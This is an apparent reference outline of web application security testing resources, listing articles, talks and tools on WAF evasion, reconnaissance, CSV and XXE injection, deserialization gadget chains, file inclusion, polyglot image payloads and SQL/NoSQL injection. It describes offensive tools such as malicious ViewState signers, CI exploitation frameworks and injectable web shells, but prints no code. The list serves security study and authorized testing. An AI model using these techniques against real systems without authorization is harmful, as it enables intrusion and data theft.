- REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during the development cycle. Astra can automatically detect and test login and logout (authentication API), so it is easy for anyone to integrate it into a CI/CD pipeline. Astra can take an API collection as input, so it can also be used for testing APIs in standalone mode.
- Reference
- Web Services Security Testing Cheat Sheet Introduction - OWASP
- REST Security Cheat Sheet
- REST Assessment Cheat Sheet
- RESTful API Best Practices and Common Pitfalls - Spencer Schneidenbach
- 101
- Articles/Blogposts/Writeups
- Executing commands in ruby
- Attacking Ruby on Rails Applications - phrack
- Going AUTH the Rails on a Crazy Train: A Dive into Rails Authentication and Authorization
- Property Oriented Programming - Applied to Ruby
- Pentesting Django and Rails
- Execution of shell code in Ruby scripts
- Tools
- Brakeman
- Brakeman is an open source static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
- 101
- Web Assembly
- A cartoon intro to WebAssembly
- Articles
- Lin Clark: A Cartoon Intro to WebAssembly | JSConf EU 2017
- WebAssembly Design Documents
- This repository contains documents describing the design and high-level overview of WebAssembly.
- Articles/Papers/Talks/Writeups
- Tools
- WebAssembly for .NET
- A library able to create, read, modify, write and execute WebAssembly (WASM) files from .NET-based applications. Execution does not use an interpreter. WASM instructions are mapped to their .NET equivalents and converted to native machine language by the .NET JIT compiler.
- Reversing
- Web-(Dis)Assembly - Christophe Alladoum - Shakacon X
- https://github.com/sophos/WebAssembly/blob/master/Misc/Web-(Dis)Assembly.pdf
- Analyzing WebAssembly binaries: initial feel and behavioral analysis - John Bergbom
- Analyzing WebAssembly binaries - Wasm Reverse Engineering - John Bergbom
- Manual reverse engineering of WebAssembly: static code analysis - John Bergbom
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Talks & Presentations
- Dupe Key Confusion
- An attack to bypass XML signature verification by sending multiple key identifiers in the KeyInfo section. Vulnerable systems will use the first one to verify the XML signature and the second one to verify the trust on the signing party. This plugin applies the technique to SAML tokens by allowing you to modify and then re-sign the SAML assertion with an arbitrary attacker-controlled key, which is then sent as the first element of the KeyInfo section, while the original key identifier is sent as the second key identifier.
- Tools
- Web Application Firewalls
- ModSecurity
- ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analysis.
- Shadow Daemon
- Shadow Daemon is a collection of tools to detect, record and prevent attacks on web applications. Technically speaking, Shadow Daemon is a web application firewall that intercepts requests and filters out malicious parameters. It is a modular system that separates web application, analysis and interface to increase security, flexibility and expandability. Shadow Daemon is free software. It is released under the GPLv2 license, so its source code can be examined, modified and distributed by everyone.
- Articles/Blogposts/Writeups
- Bypassing WAFs
- WAF Bypass Cheatsheet/gitbook
- Web Application Firewall (WAF) Evasion Techniques - theMiddle
- Web Application Firewall (WAF) Evasion Techniques #2 - theMiddle
- Web Application Firewall (WAF) Evasion Techniques - secjuice
- Bypassing Web-Application Firewalls by abusing SSL/TLS - 0x09AL
- Request encoding to bypass web application firewalls - NCCGroup
- Talks & Presentations
- HTTP Invisibility Cloak by Soroush Dalili - SteelCon2017
- This talk illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
- Tools
- WhatWaf
- WhatWaf is an advanced firewall detection tool whose goal is to give you the idea of "There's a WAF?". WhatWaf works by detecting a firewall on a web application, and attempting to detect a bypass (or two) for said firewall, on the specified target.
- WAFPASS
- Analyses parameters with all payload bypass methods, aiming to benchmark security solutions such as WAFs.
- WAF_buster
- LightBulb
- LightBulb is an open source python framework for auditing web application firewalls and filters.
- WAFNinja
- WAFNinja is a tool which contains two functions to attack Web Application Firewalls.
- Web Application Firewall Profiling and Evasion - Michael Ritter - OWASP
- Guide To Identifying And Bypassing WAFs
- ftw
- Framework for Testing WAFs (FTW!)
- 101
- Articles/Blogposts/Writeups
- Specific Frameworks
- Angular
- Apache Struts
- ASP.NET
- Getting Shell with XAMLX Files - Soroush Dalili
- ASP.NET resource files (.RESX) and deserialisation issues - Soroush Dalili
- Uploading web.config for Fun and Profit 2 - Soroush Dalili
- Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data - Soroush Dalili
- XAML overview in WPF - docs.ms
- Rare ASP.NET request validation bypass using request encoding - nccgroup
- Understanding ASP.NET View State - docs.ms
- viewstate
- A small Python 3.5+ library for decoding ASP.NET viewstate.
- viewgen
- viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
- RCEvil.NET
- RCEvil.NET is a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target. See http://illuminopi.com/ for full details on the attack vector.
- Flask
- See SSI/Template Injection
- Injecting Flask - Ryan Reid
- In this adventure we will discuss some of the security features available and potential issues within the Flask micro-framework with respect to Server-Side Template Injection, Cross-Site Scripting, and HTML attribute injection attacks, a subset of XSS. If you’ve never had the pleasure of working with Flask, you’re in for a treat. Flask is a lightweight python framework that provides a simple yet powerful and extensible structure (it is Python after all).
- mustache.js
- mustache-security(2013)
- This place will host a collection of security tips and tricks for JavaScript MVC frameworks and templating libraries.
- Wikis
- ReactJS
- Spring
- 101
- Articles/Blogposts/Writeups
- Tools
- Burpsuite
- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
- ZAP - Zed Attack Proxy
- The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
- Paros - Web Proxy
- A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other features include spiders, client certificates, proxy-chaining, intelligent scanning for XSS and SQL injection, etc.
- Mallory: Transparent TCP and UDP Proxy
- Mallory is a transparent TCP and UDP proxy. It can be used to get at those hard to intercept network streams, assess those tricky mobile web applications, or maybe just pull a prank on your friend.
- TCP Catcher
- TcpCatcher is a free TCP, SOCKS, HTTP and HTTPS proxy monitor server software.
- wssip
- Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
- ratproxy
- Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.
- Apache
- Jetty
- NGINX
- Attacking
- Securing
- Center for Internet Security Apache Server 2.4 Hardening Guide
- Securing Web Application Technologies Checklist
- Wordpress Security Guide - WPBeginner
- API Security Checklist
- OWASP Application Security Verification Standard Project(ASVS)
- The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls and also provides developers with a list of requirements for secure development.
- Magical Code Injection Rainbow Framework
- The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds. It has testing lessons for XSS, CSRF and SQL injection.
- Guides & Methodologies
- OWASP Testing Checklist
- WebAppSec Testing Checklist
- OWASP Testing Checklist(OTGv4)
- OWASP based Web Application Security Testing Checklist is an Excel based checklist which helps you to track the status of completed and pending test cases. This checklist is completely based on OWASP Testing Guide v 4. The OWASP Testing Guide includes a “best practice” penetration testing framework which users can implement in their own organizations and a “low level” penetration testing guide that describes techniques for testing most common web application security issues. Moreover, the checklist also contains OWASP Risk Assessment Calculator and Summary Findings template.
- LTR101: Web App Testing - Methods to The Madness - Andy Gill
- LTR101: Web Application Testing Methodologies - Andy Gill
- Payloads
- Tactics
- General Reconnaissance Techniques
- Insecure HTTP Header Removal
- Backslash Powered Scanning: Hunting Unknown Vulnerability Classes
- Existing web scanners search for server-side injection vulnerabilities by throwing a canned list of technology-specific payloads at a target and looking for signatures - almost like an anti-virus. In this document, I'll share the conception and development of an alternative approach, capable of finding and confirming both known and unknown classes of injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
- Attack Surface Reconnaissance
- Articles/Blogposts/Writeups
- Tools
- AttackSurfaceMapper
- Attack Surface Mapper is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target. You feed in a mixture of one or more domains, subdomains and IP addresses and it uses numerous techniques to find more targets. It enumerates subdomains with bruteforcing and passive lookups, other IPs of the same network block owner, IPs that have multiple domain names pointing to them, and so on. Once the target list is fully expanded it performs passive reconnaissance on them, taking screenshots of websites, generating visual maps, looking up credentials in public breaches, passive port scanning with Shodan and scraping employees from LinkedIn.
- intrigue-core
- Intrigue-core is a framework for external attack surface discovery and automated OSINT.
- Domain Analyzer
- Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.
- domain-profiler
- domain-profiler is a tool that uses information from various sources (Whois, DNS, SSL, ASN) to determine what decisions have been made regarding a domain or list of domains.
- The Hamburglar
- Hamburglar -- collect useful information from urls, directories, and files
- (Sub)Domain Reconnaissance
- Articles/Blogposts/Writeups
- Domain Discovery
- DRROBOT
- Dr.ROBOT is a tool for Domain Reconnaissance and Enumeration. By utilizing containers to reduce the overhead of dealing with dependencies, inconsistencies across operating systems, and different languages, Dr.ROBOT is built to be highly portable and configurable.
- Subdomain Discovery Tools
- Sudomy
- Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in a fast and comprehensive way.
- domains-from-csp
- A Python script to parse domain names from CSP header
- pdlist - A passive subdomain finder
- pdlist is a passive subdomain finder written in python3. This tool can be used effectively to collect information about a domain without ever sending a single packet to any of its hosts. Given a domain like "example.com" it will find all the hosts which have a hostname <something>.example.com or URLs strictly related to example.com.
- Subdomain Takeover
- Virtual Hosts
- 101
- Tools
- virtual-host-discovery
- This is a basic HTTP scanner that'll enumerate virtual hosts on a given IP address. During recon, this might help expand the target by detecting old or deprecated code. It may also reveal hidden hosts that are statically mapped in the developer's /etc/hosts file.
- blacksheepwall
- blacksheepwall is a hostname reconnaissance tool
- VHostScan
- A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
- Visual Reconnaissance
- Articles/Blogposts/Writeups
- Tools
- PowerWebShot
- A PowerShell tool for taking screenshots of multiple web servers quickly.
- HTTrack - Website Copier
- It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
- Kraken
- Kraken is a tool to help make your web interface testing workflow more efficient. This is done by using Django, Apache, and a MySQL database to store and organize web interface screenshots and data. This allows you and your team to take notes and track which hosts have been tested simultaneously. Once you are finished, you can view the notes you took and generate reports in the Reports section.
- Eyeballer
- Eyeballer is meant for large-scope network penetration tests where you need to find "interesting" targets from a huge set of web-based hosts. Go ahead and use your favorite screenshotting tool like normal (EyeWitness or GoWitness) and then run them through Eyeballer to tell you what's likely to contain vulnerabilities, and what isn't.
- gowitness
- gowitness is a website screenshot utility written in Golang that uses Chrome Headless to generate screenshots of web interfaces from the command line. Both Linux and macOS are supported, with Windows support 'partially working'.
- webscreenshot
- A simple script to screenshot a list of websites, based on the url-to-image PhantomJS script.
- LazyShot
- The simplest way to take an automated screenshot of given URLs. Easy installation!
- RAWR - Rapid Assessment of Web Resources
- 3rd Party Hosted Tools
- VisualSiteMapper
- Visual Site Mapper is a free service that can quickly show a map of your site.
- Recon
- HTTPLeaks
- HTTPLeaks - All possible ways, a website can leak HTTP requests
- General
- hackability
- Rendering Engine Hackability Probe performs a variety of tests to discover what the unknown rendering engine supports. To use it simply extract it to your web server and visit the url in the rendering engine you want to test. The more successful probes you get the more likely the target engine is vulnerable to attack.
- Content/Folder Discovery
- Tachyon
- Tachyon is a Fast Multi-Threaded Web Discovery Tool
- dirsearch
- dirsearch is a simple command line tool designed to brute force directories and files in websites.
- LinkFinder
- LinkFinder is a python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing, resulting in new testing ground, possibly containing new vulnerabilities. It does so by using jsbeautifier for python in combination with a fairly large regular expression.
- JS-based scanning
- Web Page
- Web Server
- WhatWeb
- httprecon - Advanced Web Server Fingerprinting
- The httprecon project is doing research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis. Besides the discussion of different approaches and the documentation of gathered results, an implementation for automated analysis is also provided. This software shall improve the ease and efficiency of this kind of enumeration. Traditional approaches such as banner grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting. Some of them were already discussed in the book Die Kunst des Penetration Testing (Chapter 9.3, HTTP-Fingerprinting, pp. 530-550).
- HTTP Enumeration
- Articles/Blogposts/Writeups
- Tools
- Arjun
- HTTP parameter discovery suite.
- Psi-Probe
- Advanced manager and monitor for Apache Tomcat, forked from Lambda Probe
- HTTPie - curl for humans
- HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
- Endpoint Discovery
- Articles/Blogposts/Writeups
- Tools
- LinkFinder
- A python script that finds endpoints in JavaScript files
- JSParser
- A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting.
- Forced-Browsing
- Articles/Blogposts/Writeups
- Tools
- Tachyon
- Dirsearch
- OpenDoor
- OpenDoor OWASP is a console-based multifunctional web site scanner. This application finds all possible ways to log in, index of/ directories, web shells, restricted access points, subdomains, hidden data and large backups. The scanning is performed by the built-in dictionary and external dictionaries as well. Anonymity and speed are provided by means of proxy servers.
- ffuf - Fuzz Faster U Fool
- A fast web fuzzer written in Go.
- rustbuster
- A Comprehensive Web Fuzzer and Content Discovery Tool
- Site/Technology Identification
- WhatWeb
- WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
- CMSExplorer
- CMS Explorer is designed to reveal the specific modules, plugins, components and themes that various CMS-driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
- BlindElephant Web Application Fingerprinter
- The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
- Fingerprinter
- CMS/LMS/Library etc Versions Fingerprinter. This script's goal is to try to find the version of the remote application/third party script etc by using a fingerprinting approach.
- Web Filter External Enumeration Tool (WebFEET)
- WebFEET is a web application for the drive-by enumeration of web security proxies and policies. See associated white paper (Drive-by enumeration of web filtering solutions)
- Vulnerability Scanner
- Nikto
- Spaghetti - Web Application Security Scanner
- Spaghetti is an open-source web application scanner designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on Python 2.7 and can run on any platform with a Python environment.
- skipfish
- Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
- wikto
- Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
- WATOBO
- WATOBO is a security tool for testing web applications. It is intended to enable security professionals to perform efficient (semi-automated) web application security audits.
- YASUO
- Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.
- ParrotNG
- ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461
- Arachni Web Scanner
- Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.
- Pyfiscan
- Pyfiscan is a free web application vulnerability and version scanner that can be used to locate outdated versions of common web applications on Linux servers. An example use case is hosting providers keeping an eye on their users' installations to keep up with security updates. Fingerprints are easy to create and modify, as users can write them in YAML syntax. Pyfiscan also contains a tool to create email alerts using templates.
- autochrome
- This tool downloads, installs, and configures a shiny new copy of Chromium.
- Article
- jsgifkeylogger
- A JavaScript keylogger embedded in a GIF file. This is a PoC.
- Dirbuster
- DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. Often what looks like a web server in a default installation state is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
- Go Buster
- Directory/file busting tool written in Go
- Recursive, CLI-based, no java runtime
- WFuzz
- Wfuzz is a tool designed for brute-forcing web applications. It can be used for finding resources that are not linked (directories, servlets, scripts, etc.), brute-forcing GET and POST parameters to check for different kinds of injection (SQL, XSS, LDAP, etc.), brute-forcing form parameters (user/password), fuzzing, etc.
- dirsearch
- dirsearch is a simple command line tool designed to brute force directories and files in websites.
- Tachyon
- Tachyon is a Fast Multi-Threaded Web Discovery Tool
- Syntribos
- Given a simple configuration file and an example HTTP request, syntribos can replace any API URL, URL parameter, HTTP header and request body field with a given set of strings. Syntribos iterates through each position in the request automatically. Syntribos aims to automatically detect common security defects such as SQL injection, LDAP injection, buffer overflow, etc. In addition, syntribos can be used to help identify new security defects by automated fuzzing.
- cider - Continuous Integration and Deployment Exploiter
- CIDER is a framework written in Node.js that aims to harness the functions necessary for exploiting Continuous Integration (CI) systems and their related infrastructure and build chain (e.g. Travis-CI, Drone, Circle-CI). Most of the exploits in CIDER target CI build systems through open GitHub repositories via malicious Pull Requests. It is built modularly to encourage contributions, so more exploits, attack surfaces, and build chain services will be integrated in the future.
- Rotten Apple
- A tool for testing continuous integration (CI) or continuous delivery (CD) system security
- Exploiting Continuous Integration (CI) and Automated Build Systems - spaceb0x
- 101
- Articles/Blogposts/Writeups
- Everything about the CSV Excel Macro Injection - Ishaq Mohammed
- From CSV to CMD to qwerty - exploresecurity
- Tricks to improve web app excel export attacks (Slides) - Jerome Smith - CamSec2016
- Video
- This presentation is an embellished version of the second half of a talk originally presented at BSides MCR 2016. It covers more general web app export issues as well as revisions on the DDE content following feedback from BSides. This talk also had more demos.
- CSV Injection Revisited - Making Things More Dangerous(and fun) - Andy Gill
- From CSV to Meterpreter - XPNSec
- CSV Injection- There's devil in the detail - Sunil Joshi
- CSV injection: Basic to Exploit!!!! - Akansha Kesharwani
- [Cell Injection] Attacking the end user through the application - David Stubley
- The Absurdly Underestimated Dangers of CSV Injection - George Mauer
- Data Extraction to Command Execution CSV Injection - Jamie Rougvie
- Comma Separated Vulnerabilities
- This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.
- [Cell Injection] Attacking the end user through the application - 7elements.co.uk
- Microsoft Excel CSV code execution/injection method - xor %eax,%eax
- Talks & Presentations
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- HTML Form Protocol Attack - Jochen Topf(2001)
- This paper describes how some HTML browsers can be tricked through the use of HTML forms into sending more or less arbitrary data to any TCP port. This can be used to send commands to servers using ASCII based protocols like SMTP, NNTP, POP3, IMAP, IRC, and others. By sending HTML email to unsuspecting users or using a trojan HTML page, an attacker might be able to send mail or post Usenet News through servers normally not accessible to him. In special cases an attacker might be able to do other harm, e.g. deleting mail from a POP3 mailbox.
- Presentations/Talks/Videos
- Tools
- Extract data
- Extract data is a demo combining a cross-protocol request attack with DNS rebinding
- 101
- Articles/Blogposts/Writeups
- Content-Type Blues - Neil Bergman
- Exploiting CVE-2011-2461 on google.com - Mauro Gentile
- Cross-Site Content (Data) Hijacking (XSCH) PoC Project
- Even uploading a JPG file can lead to Cross-Site Content Hijacking (client-side attack)! - Soroush Dalili
- Same Origin Policy Weaknesses - Kuza55
- The lesser known pitfalls of allowing file uploads on your website - Mathias Karlsson, Frans Rosén
- Papers
- Presentations/Talks/Videos
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- Onsite-Request-Forgery
- 101
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- 101
- Articles/Blogposts/Presentations/Talks/Videos
- Tools
- Unphp.net php decoder
- Various forms of encoding/decoding web app
- Javascript De-Obfuscation Tools Redux
- Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.
- Javascript Deobfuscator - kahusecurity
- Revelo - kahusecurity
- --> See XML section
- Hunting in the Dark - Blind XXE
- Security Implications of DTD Attacks Against a Wide Range of XML Parsers
- Comma Separated Vulnerabilities
- Exploiting Out Of Band XXE using internal network and php wrappers - Mahmoud Gamal
- Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari
- Exploiting CVE-2016-4264 With OXML_XXE
- XXE: How to become a Jedi - Yaroslav Babin(Zeronights 2017)
- Exploiting XXE Vulnerabilities In File Parsing Functionality - Willis Vandevanter - BHUSA 2015
- In this 25-minute briefing, we will discuss techniques for exploiting XXE vulnerabilities in File Parsing/Upload functionality. Specifically, XML Entity Attacks are well known, but their exploitation inside XML supported file formats such as docx, xlsx, pptx, and others are not. Discussing the technically relevant points step by step, we will use real world examples from products and recent bug bounties. Finally, in our experience, creating 'XXE backdoored' files can be a very slow process. We will introduce our battle tested tool for infecting the file formats discussed.
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- Execution After Redirect
- Open Redirect
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- fuxploider
- File upload vulnerability scanner and exploitation tool.
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Revisiting XSS payloads in PNG IDAT chunks - Adam Logue
- An XSS on Facebook via PNGs & Wonky Content Types - [email protected]
- Encoding Web Shells in PNG IDAT chunks - idontplaydarts
- Bypassing CSP using polyglot JPEGs - Gareth Heyes
- Hacking group using Polyglot images to hide malvertising attacks - Josh Summit
- BMP/x86 Polyglot - [email protected]
- Upload a web.config File for Fun & Profit - Soroush Dalili
- Uploading web.config for Fun and Profit 2 - Soroush Dalili
- Encoding Web Shells in PNG IDAT chunks - phil
- An XSS on Facebook via PNGs & Wonky Content Types - fin1te
- Tools
- xss2png
- A simple tool to generate PNG images with XSS payloads stored in PNG IDAT chunks
- pixload
- Set of tools for creating/injecting payload into images.
- PNG-IDAT-Payload-Generator
- Generate a PNG with a payload embedded in the IDAT chunk (Based off of previous concepts and code -- credit in README)
- Imagecreatefromgif-Bypass
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong - AppSecUSA 2017
- Remote Code Execution in Firefox beyond memory corruptions(2019) - Frederik Braun
- Browsers are complicated enough to have attack surface beyond memory safety issues. This talk will look into injection flaws in the user interface of Mozilla Firefox, which is implemented in JS, HTML, and an XML dialect called XUL. With a Cross-Site Scripting (XSS) vulnerability in the user interface, attackers can execute arbitrary code in the context of the main browser application process. This allows for cross-platform exploits of high reliability. The talk discusses past vulnerabilities and will also suggest mitigations that benefit Single Page Applications and other platforms that may suffer from DOM-based XSS, like Electron.
- Tools
- See also: JNDI, JSON, SQLi, XSS
- General
- Testing
- Tools
- Writeups
- General
- Testing
- jndipoc
- Proof of concept showing how java byte code can be injected through InitialContext.lookup() calls
- Tools
- Writeups
- General
- .NET
- Articles/Blogposts/Writeups
- .NET Serialization: Detecting and defending vulnerable endpoints - Alvaro Munoz
- ASP.NET resource files (.RESX) and deserialisation issues - Soroush Dalili
- RCEVIL.NET: A Super Serial Story - Jared McLaren(BSides Iowa2019)
- HITCON 2018: Why so Serials? Write-up - cyku.tw
- HITCON CTF 2018 - Why so Serials? Writeup - Orange
- Talks/Presentations/Videos
- Papers
- Tools
- YSoSerial.Net
- ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
- Articles/Blogposts/Writeups
- Java
- Articles/Blogposts/Writeups
- General
- Java-Deserialization-Cheat-Sheet
- A cheat sheet for pentesters about Java Native Binary Deserialization vulnerabilities
- Presentations/Talks/Videos
- Papers
- Java Unmarshaller Security - Turning your data into code execution
- This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques.
- tool from the above paper: marshalsec
- Tools
- Break Fast Serial
- A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs
- ysoserial
- JMET
- JMET was released at Black Hat USA 2016 and is an outcome of Code White's research effort presented in the talk "Pwning Your Java Messaging With Deserialization Vulnerabilities". The goal of JMET is to make the exploitation of the Java Message Service (JMS) easy. In the talk, more than 12 JMS client implementations were shown to be vulnerable to deserialization attacks. The specific deserialization vulnerabilities were found in ObjectMessage implementations (classes implementing javax.jms.ObjectMessage).
- Exploits
- SerialKiller: Bypass Gadget Collection
- Collection of bypass gadgets that can be used in JVM deserialization gadget chains to bypass "Look-Ahead ObjectInputStreams" defensive deserialization.
- Serianalyzer
- A static byte code analyzer for Java deserialization gadget research
- Java Deserialization Exploits
- A collection of Java Deserialization Exploits
- Java Deserialization Exploits
- A collection of curated Java Deserialization Exploits
- PHP
- Python
- 101
- Articles/Blogposts/Writeups
- Tools
- 101
- Articles/Papers/Writeups
- LFI with PHPINFO() Assistance - InsomniaSecurity 2011
- Turning LFI into RFI
- When configured in a specific way the web application would load the JAR file and search within the file for a class. Interestingly enough, in Java classes you can define a static block that is executed upon the class being processed
- Unrestricted File Upload Security Testing - Aptive
- LFI2RCE (Local File Inclusion to Remote Code Execution) advanced exploitation: /proc shortcuts
- This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities.
- Turning LFI to RFI
- Local file inclusion tricks
- Upgrade from LFI to RCE via PHP Sessions
- CVV #1: Local File Inclusion - SI9INT
- [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos]
- File Inclusion - nets.ec
- Cheat Sheets/Reference Lists
- Testing
- OWASP LFI
- LFI Local File Inclusion Techniques (paper)
- This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such an aim is well known, this one is a specific technique that had not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly.
- Update: a third (known) technique has been dissected here
- Tools
- dotdotpwn
- Liffy
- Liffy is a Local File Inclusion Exploitation tool.
- lfi-labs
- small set of PHP scripts to practice exploiting LFI, RFI and CMD injection vulns
- psychoPATH - LFI
- This tool is a highly configurable payload generator detecting LFI & web root file uploads. Involves advanced path traversal evasive techniques, dynamic web root list generation, output encoding, site map-searching payload generator, LFI mode, nix & windows support plus single byte generator.
- Kadimus
- Kadimus is a tool to check sites for LFI vulnerabilities, and also to exploit them.
- lfipwn
- LFISuite
- 101
- General
- Reference
- Articles/Blogposts/Writeups
- Abusing NoSQL Databases - Ming Chow
- No SQL, No Injection? - Examining NoSQL Security
- NoSQL Injection in Modern Web Applications - petecorey.com
- Finding SQL injections fast with white-box analysis — a recent bug example - Frycos
- Blind (time-based) SQLi - Bug Bounty - jspin.re
- SELECT code_execution FROM * USING SQLite; Gaining code execution using a malicious SQLite database - Omer Gull
- Beyond SQLi: Obfuscate and Bypass - CWH Underground
- Tools
- sqlmap
- jSQL Injection
- jSQL Injection is a Java application for automatic SQL database injection.
- mongoaudit
- Laudanum
- “Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments. They provide functionality such as shell, DNS query, LDAP retrieval and others.”
- GraFScaN
- Training
- SQLi Lab lessons
- SQLI-LABS is a platform to learn SQLI
- Writeups
- DB2
- MongoDB
- Intro to Hacking Mongo DB - SecuritySynapse
- Attacking MongoDB - ZeroNights2012
- MongoDB Injection - How To Hack MongoDB
